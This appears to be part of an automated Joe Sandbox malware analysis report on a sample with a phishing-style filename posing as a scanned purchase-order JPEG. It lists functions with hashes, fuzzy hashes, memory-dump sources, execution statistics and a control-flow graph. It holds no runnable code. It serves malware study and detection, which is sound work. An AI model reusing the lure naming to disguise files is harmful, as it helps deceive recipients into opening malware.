                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c01310d94d59dbb5f0fc54326b4bb99d59c7c232521fbc416a14766b937c8781
                                                                                                        • Instruction ID: b11ee94b5e5181a94f6a98170ceb3e1ff422b66fd25555b19487429b305da98e
                                                                                                        • Opcode Fuzzy Hash: c01310d94d59dbb5f0fc54326b4bb99d59c7c232521fbc416a14766b937c8781
                                                                                                        • Instruction Fuzzy Hash: B7F0B4713006209FC7249B1AE444A5AF7BAFFC8624B10426EE40687365DB71EC41C790
                                                                                                        Function 0573B228 Relevance: .0, Instructions: 33COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                                        • Instruction ID: 4243ceffdd30f352615e2fe6667d750750fc4abca0ae9b7f9b7c733986b7bd1f
                                                                                                        • Opcode Fuzzy Hash: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                                        • Instruction Fuzzy Hash: 0601B675D00609DFCB40EFACC54589DBBF4FF49210B1185AAE859EB321E770AA44CF91
                                                                                                        Function 0573AD69 Relevance: .0, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 58f52687aa050cf5efaadf725eb626fafd76ad26a58e59991b37d4576eeb68de
                                                                                                        • Instruction ID: 47b0072f1afaccd1623a2b91c6610d3b2142962d3771438017fb15b5cf28511e
                                                                                                        • Opcode Fuzzy Hash: 58f52687aa050cf5efaadf725eb626fafd76ad26a58e59991b37d4576eeb68de
                                                                                                        • Instruction Fuzzy Hash: 65F0E2B5900218CFDB20DF99D449B9EFBF0AB98324F24C41AD599A7361C378A544CFA1
                                                                                                        Function 0573AE99 Relevance: .0, Instructions: 29COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9e594acaf7ca3c017a78984df0169a54c52bfc9c893e541d20b0caef5438ce27
                                                                                                        • Instruction ID: 67279800a8039f37f5c19f0fd77a3c0a16c7027f01172595c2a318f050ca6094
                                                                                                        • Opcode Fuzzy Hash: 9e594acaf7ca3c017a78984df0169a54c52bfc9c893e541d20b0caef5438ce27
                                                                                                        • Instruction Fuzzy Hash: CEE0E5712047045FC730DA25CC0AD6777ADEF44664700486DE88987652E631E805D690
                                                                                                        Function 0573E4C0 Relevance: .0, Instructions: 28COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e7560a0daa7be73d65cab2b0860bff90bf182d5720c1b6e06b8dc6bb62326f2f
                                                                                                        • Instruction ID: e5ab57c6b4843ea492ba06b6ff2033cda6302608e8dedd8a6ecbc8ab6e88b311
                                                                                                        • Opcode Fuzzy Hash: e7560a0daa7be73d65cab2b0860bff90bf182d5720c1b6e06b8dc6bb62326f2f
                                                                                                        • Instruction Fuzzy Hash: C5F0DF30240610CFC718DB2CD588C59BBEAFF4AB1971185A9E51ACB372CBB2EC40CB80
                                                                                                        Function 05738CEC Relevance: .0, Instructions: 24COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cd9aaa1c65b3703b9785dc9632217ceadd96ec6d9e9be544301ec3287a465031
                                                                                                        • Instruction ID: a31a3df556074e61b9e2d7246e87514e6b131645dd9d0e2f07cdd9f559932da0
                                                                                                        • Opcode Fuzzy Hash: cd9aaa1c65b3703b9785dc9632217ceadd96ec6d9e9be544301ec3287a465031
                                                                                                        • Instruction Fuzzy Hash: A7E0D83214415D6FCB02DF59D901ADA7F9DEF4D310F008491FA54C6122C33AD966A7E5
                                                                                                        Function 05732FE4 Relevance: .0, Instructions: 23COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 19580ff4a23fa9dc17a4e0761cef0e1774d4ea06817f46d2c228ba311835e1cf
                                                                                                        • Instruction ID: 85047c81af25f8b2336e63c622b3fa30903aca27062f71993baf90b3c419fddd
                                                                                                        • Opcode Fuzzy Hash: 19580ff4a23fa9dc17a4e0761cef0e1774d4ea06817f46d2c228ba311835e1cf
                                                                                                        • Instruction Fuzzy Hash: 79E0CD313546145FC728DB5DD48086BF3EAEF8C3117118979F10AC7365DE60FC084644
                                                                                                        Function 0573BE10 Relevance: .0, Instructions: 23COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 67ad4ba8ff3bd3504bcb7008e83fa8c3ad11d63d15fad5f756ab17875d04bcdd
                                                                                                        • Instruction ID: 8baf6ec09019851d53312b9884518564df24e1a84169dca5bb7a89989cbb29b1
                                                                                                        • Opcode Fuzzy Hash: 67ad4ba8ff3bd3504bcb7008e83fa8c3ad11d63d15fad5f756ab17875d04bcdd
                                                                                                        • Instruction Fuzzy Hash: E6E086353545108FC759CE5CD8417A5B7E1DB88310B158569E049CB7A5CA60EC0A4740
                                                                                                        Function 0573DD20 Relevance: .0, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 438de1b2423d0db34da19905ed93e6fc7787cda23fb842cbc845a923730b1f01
                                                                                                        • Instruction ID: e88e31864fca7c3844c17b5920d233729c4b6495365aa9db6476e0910f883b98
                                                                                                        • Opcode Fuzzy Hash: 438de1b2423d0db34da19905ed93e6fc7787cda23fb842cbc845a923730b1f01
                                                                                                        • Instruction Fuzzy Hash: 2ED0A7323100301BC2A0945C7C587AE21AAC7C92A0B54003EFD02D7380DD909E0623D8
                                                                                                        Function 0573EF10 Relevance: .0, Instructions: 17COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 67953f9b2db748affb3cd3868e5f2dea995b6ace08411daeff57a498ca06cb9f
                                                                                                        • Instruction ID: 8852a79040f66bf972c2d3a2e8759c2cb20968e8e0d33fcfb39262b18856ffe7
                                                                                                        • Opcode Fuzzy Hash: 67953f9b2db748affb3cd3868e5f2dea995b6ace08411daeff57a498ca06cb9f
                                                                                                        • Instruction Fuzzy Hash: A7D0A7B50954465BD3460260AE5B3B52E65E3013D5F080079D89585143D511C0067746
                                                                                                        Function 0573EF20 Relevance: .0, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a8558e102da5d3ff87ac18fefedf237f9eb3b93a48ef2f46e4504e6cb67add23
                                                                                                        • Instruction ID: 5380fdd250a5b9ff8beac9d953f770d9f86c541d2e60703719f7abed58912c82
                                                                                                        • Opcode Fuzzy Hash: a8558e102da5d3ff87ac18fefedf237f9eb3b93a48ef2f46e4504e6cb67add23
                                                                                                        • Instruction Fuzzy Hash: FDD012702A520B87DB5856A5B456B76379DAF40725F080069FC0FC5506EBA3E841AA12

                                                                                                        Non-executed Functions

                                                                                                        Function 0C1C6658 Relevance: .5, Instructions: 489COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5413a3628a51aeb7a28f56165602fb431afa0431b8d0b58a23e7ffcddaac1294
                                                                                                        • Instruction ID: 65298ead14e305204bcbc1086b92ffe2069369d6a6c1cd1736721740abbad818
                                                                                                        • Opcode Fuzzy Hash: 5413a3628a51aeb7a28f56165602fb431afa0431b8d0b58a23e7ffcddaac1294
                                                                                                        • Instruction Fuzzy Hash: 7F22F674F012198FCB14CF99C5C4AAEBBF2EF58304F248169E415AB356D735A982CFA1
                                                                                                        Function 056832E0 Relevance: .3, Instructions: 315COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 834edb8e8dae5e18c91640b9a3e457a8464a4c390992845a8be3c2c30f3bf44e
                                                                                                        • Instruction ID: 014181f547d18d949ed9e05113fc7a8a3ecdc75c097e3a796fd488f3275bc449
                                                                                                        • Opcode Fuzzy Hash: 834edb8e8dae5e18c91640b9a3e457a8464a4c390992845a8be3c2c30f3bf44e
                                                                                                        • Instruction Fuzzy Hash: DF126FB04017468AE730CF65F94C2897BB1BB85328B948709D2A56F6F9DBB8158BCF44
                                                                                                        Function 0C1C4C80 Relevance: .3, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b63e8861ec3f529d7d57b15c100d592dbd5d1cd0fff5e987541311d09ad16c01
                                                                                                        • Instruction ID: f5c4079c1ac9f98c5ef4e0b36a40e5dc2aacfbe3315c0d58ae906c5af19b1264
                                                                                                        • Opcode Fuzzy Hash: b63e8861ec3f529d7d57b15c100d592dbd5d1cd0fff5e987541311d09ad16c01
                                                                                                        • Instruction Fuzzy Hash: 40E11474E051198FCB14DFA9D5909AEBBB2FF88304F24C169E415AB316DB34A981CFA0
                                                                                                        Function 0C1C4848 Relevance: .3, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e53472d269a6c510d2e6e88cbc988335591914d4be49ebf1e711326095c985c3
                                                                                                        • Instruction ID: c450e1f0666d2634104714e09b01828f361f1bf8c81dd77a563ba90d99c5c048
                                                                                                        • Opcode Fuzzy Hash: e53472d269a6c510d2e6e88cbc988335591914d4be49ebf1e711326095c985c3
                                                                                                        • Instruction Fuzzy Hash: E5E10574E051198FCB14DFA9D590AAEFBB2FF88304F24C169E415AB356D730A981CFA4
                                                                                                        Function 0C1C50B8 Relevance: .3, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 50d58e6ad48977ae9245a1e6d29937ead2387e9c30925d759321582d86d307dd
                                                                                                        • Instruction ID: 35df7293e17f0473732aac4c328629186c3b716aad91bccf43f64973919f17cf
                                                                                                        • Opcode Fuzzy Hash: 50d58e6ad48977ae9245a1e6d29937ead2387e9c30925d759321582d86d307dd
                                                                                                        • Instruction Fuzzy Hash: 55E11574E012198FCB14DFA9C5809AEBBF2FF88304F248169E415AB316D734A981DFA0
                                                                                                        Function 056808D4 Relevance: .3, Instructions: 264COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c8775c15bb1242488c3a4f3acce23a4bd68f24a9d33d6d3e75e897e47ac54b4f
                                                                                                        • Instruction ID: 1488b338a546d7cf5796226db4d26d3c0adc7f8b8a976673729abb576e2f774b
                                                                                                        • Opcode Fuzzy Hash: c8775c15bb1242488c3a4f3acce23a4bd68f24a9d33d6d3e75e897e47ac54b4f
                                                                                                        • Instruction Fuzzy Hash: 8CA17136E002058FCF15EFB5C8545AEB7B2FF84310B15866AE816AB325DB71E955CF80
                                                                                                        Function 05683287 Relevance: .2, Instructions: 232COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ccdff909f48e45d4b5d3e3555e592baa1a840c1b8f470e1f90dec3b989e12f2d
                                                                                                        • Instruction ID: 19d716d153917912b49bef5628789325e8bf6558a41098d525fcd2dc370c3eed
                                                                                                        • Opcode Fuzzy Hash: ccdff909f48e45d4b5d3e3555e592baa1a840c1b8f470e1f90dec3b989e12f2d
                                                                                                        • Instruction Fuzzy Hash: 70C1E4B09007468BE720CF69E84C1897BB1FB85328F648709D1616F2F9DBB8558BCF84
                                                                                                        Function 056832D0 Relevance: .2, Instructions: 224COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4bc5782a9c275ceb40c79de548acb58179ee5e362fff415cc1bdd1ac490e56cf
                                                                                                        • Instruction ID: a8cf846720106dbdbcc27a889a5eef5dfcfcef1a842cf5b990412a44d234d9aa
                                                                                                        • Opcode Fuzzy Hash: 4bc5782a9c275ceb40c79de548acb58179ee5e362fff415cc1bdd1ac490e56cf
                                                                                                        • Instruction Fuzzy Hash: 97C1D5B18117468BE720CF69E84C2897BB1FB85328F658319D1616F2F9DBB8158BCF44
                                                                                                        Function 0C1C68A7 Relevance: .1, Instructions: 133COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5e25979edc01e6edd61622334797243e661174196d9712c8588f2ae9115906da
                                                                                                        • Instruction ID: 1a897575307fa3fc6690daffe3f5ad7bf913d5f625a7eb5210ba514e4bab8581
                                                                                                        • Opcode Fuzzy Hash: 5e25979edc01e6edd61622334797243e661174196d9712c8588f2ae9115906da
                                                                                                        • Instruction Fuzzy Hash: 8951F674E052198FDB14CFAAD5805AEBBF2AF89304F24C169E418AB316D734A941CFA1
                                                                                                        Function 0C1C50A8 Relevance: .1, Instructions: 132COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e3cecfbc7ef7150f01128815d8984192af1a019081d298f24a2ceac101621afb
                                                                                                        • Instruction ID: 6d2c635cdb31ec44b45f0c92f8e8a8067768160f0a5c4c00ec152fa428d23f1c
                                                                                                        • Opcode Fuzzy Hash: e3cecfbc7ef7150f01128815d8984192af1a019081d298f24a2ceac101621afb
                                                                                                        • Instruction Fuzzy Hash: 4C51FB70E012198FCB14DFA9D5845AEFBF2FF89304F24C169E419A7216D734A941CFA1
                                                                                                        Function 0C1C68B8 Relevance: .1, Instructions: 127COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9bbfdfdda0fc3d8cba7dba9d50dd2105e9c6d850d4247802a608ced722864e37
                                                                                                        • Instruction ID: b8e22a5ff88793e51eae76e56f38dde6c32b567b5555a497aedb77a44732a15a
                                                                                                        • Opcode Fuzzy Hash: 9bbfdfdda0fc3d8cba7dba9d50dd2105e9c6d850d4247802a608ced722864e37
                                                                                                        • Instruction Fuzzy Hash: 4D51D674E012198FDB14CFAAD5805AEBBF2AF89304F24C169E418A7316D735A941CFA1
                                                                                                        Function 05734748 Relevance: 41.7, Strings: 33, Instructions: 438COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                        • API String ID: 0-2697097662
                                                                                                        • Opcode ID: 5b1c5e09f713171a393af86cb18c3c3707e887f346c8b2a341c49ffba359c974
                                                                                                        • Instruction ID: ae0bcbe709b49834facee504a237f6a1212ed0d058d81558e4ab85d5dfb56503
                                                                                                        • Opcode Fuzzy Hash: 5b1c5e09f713171a393af86cb18c3c3707e887f346c8b2a341c49ffba359c974
                                                                                                        • Instruction Fuzzy Hash: 78123F70E0121A9FCB18EF75E89169DB7B2FF40304F5085A9D009AB269EF346D89CF91
                                                                                                        Function 05734758 Relevance: 41.7, Strings: 33, Instructions: 434COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                        • API String ID: 0-2697097662
                                                                                                        • Opcode ID: 3ce96b5fcb726b5adc52df689bde18aa0f1db479569456e816197589ead0a951
                                                                                                        • Instruction ID: cbc033e6430d74e63db3cb082f157aed17376aeb5c7a5a886933d5ab47e14560
                                                                                                        • Opcode Fuzzy Hash: 3ce96b5fcb726b5adc52df689bde18aa0f1db479569456e816197589ead0a951
                                                                                                        • Instruction Fuzzy Hash: 3E123F70A0121A9FCB18EF75E99169DB7B2FF40304F5085A9D009AB279EF346D89CF91

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:17.3%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:14.9%
                                                                                                        Total number of Nodes:47
                                                                                                        Total number of Limit Nodes:13
                                                                                                        execution_graph 19589 6919c18 19590 6919c1f 19589->19590 19592 6919c25 19589->19592 19590->19592 19594 6919fa6 19590->19594 19595 6919328 19590->19595 19593 6919328 2 API calls 19593->19594 19594->19592 19594->19593 19596 691933a 19595->19596 19597 691933f 19595->19597 19596->19594 19597->19596 19598 691957e LdrInitializeThunk 19597->19598 19601 6919619 19598->19601 19599 69196d9 19599->19594 19600 6919a69 LdrInitializeThunk 19600->19599 19601->19599 19601->19600 19602 122e018 19607 122e024 19602->19607 19604 122e61f 19609 6912968 19607->19609 19610 691298a 19609->19610 19611 122e0c3 19610->19611 19614 6919328 2 API calls 19610->19614 19624 6919548 19610->19624 19632 691992c 19610->19632 19638 6919318 19610->19638 19616 691fc68 19611->19616 19620 691fc5e 19611->19620 19614->19611 19617 691fc8a 19616->19617 19618 6919548 4 API calls 19617->19618 19619 691fd3a 19617->19619 19618->19619 19619->19604 19621 691fc8a 19620->19621 19622 6919548 4 API calls 19621->19622 19623 691fd3a 19621->19623 19622->19623 19623->19604 19625 6919579 19624->19625 19626 691957e LdrInitializeThunk 19624->19626 19625->19626 19630 6919619 19626->19630 19627 69196d9 19627->19611 19628 6919924 LdrInitializeThunk 19628->19627 19630->19627 19630->19628 19631 6919328 2 API calls 19630->19631 19631->19630 19636 69197e3 19632->19636 19633 6919924 LdrInitializeThunk 19635 6919a81 19633->19635 19635->19611 19636->19633 19637 6919328 2 API calls 19636->19637 19637->19636 19639 691933a 19638->19639 19640 691933f 19638->19640 19639->19611 19640->19639 19641 691957e LdrInitializeThunk 19640->19641 19643 6919619 19641->19643 19642 69196d9 19642->19611 19643->19642 19644 6919924 LdrInitializeThunk 19643->19644 19646 6919328 2 API calls 19643->19646 19644->19642 19646->19643

                                                                                                        Executed Functions

                                                                                                        Function 01227118 Relevance: 6.7, Strings: 5, Instructions: 414COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 146 1227118-122713b 147 1227146-1227166 146->147 148 122713d-1227143 146->148 151 1227168 147->151 152 122716d-1227174 147->152 148->147 153 12274fc-1227505 151->153 154 1227176-1227181 152->154 155 1227187-122719a 154->155 156 122750d-1227519 154->156 159 12271b0-12271cb 155->159 160 122719c-12271aa 155->160 161 122751b-1227521 156->161 162 122753d 156->162 169 12271ef-12271f2 159->169 170 12271cd-12271d3 159->170 160->159 172 1227484-122748b 160->172 163 1227523-122753b 161->163 164 1227545-1227549 161->164 162->164 163->162 166 1227552-122755b 164->166 167 122754b-1227550 164->167 171 122755c-1227585 166->171 167->171 177 12271f8-12271fb 169->177 178 122734c-1227352 169->178 173 12271d5 170->173 174 12271dc-12271df 170->174 191 1227587-1227589 171->191 192 122758b-122759a 171->192 172->153 175 122748d-122748f 172->175 173->174 173->178 179 1227212-1227218 173->179 180 122743e-1227441 173->180 174->179 181 12271e1-12271e4 174->181 182 1227491-1227496 175->182 183 122749e-12274a4 175->183 177->178 185 1227201-1227207 177->185 178->180 184 1227358-122735d 178->184 193 122721a-122721c 179->193 194 122721e-1227220 179->194 195 1227447-122744d 180->195 196 1227508 180->196 187 12271ea 181->187 188 122727e-1227284 181->188 182->183 183->156 189 12274a6-12274ab 183->189 184->180 185->178 190 122720d 185->190 187->180 188->180 200 122728a-1227290 188->200 197 12274f0-12274f3 189->197 198 12274ad-12274b2 189->198 190->180 199 12275e9-12275eb 191->199 215 12275e4 192->215 216 122759c-12275ab 192->216 201 122722a-1227233 193->201 194->201 202 1227472-1227476 195->202 203 122744f-1227457 195->203 196->156 197->196 205 12274f5-12274fa 197->205 198->196 206 12274b4 198->206 207 1227292-1227294 200->207 208 1227296-1227298 200->208 211 1227246-122726e 201->211 212 1227235-1227240 201->212 202->172 204 1227478-122747e 202->204 203->156 210 122745d-122746c 203->210 204->154 204->172 205->153 205->175 213 12274bb-12274c0 206->213 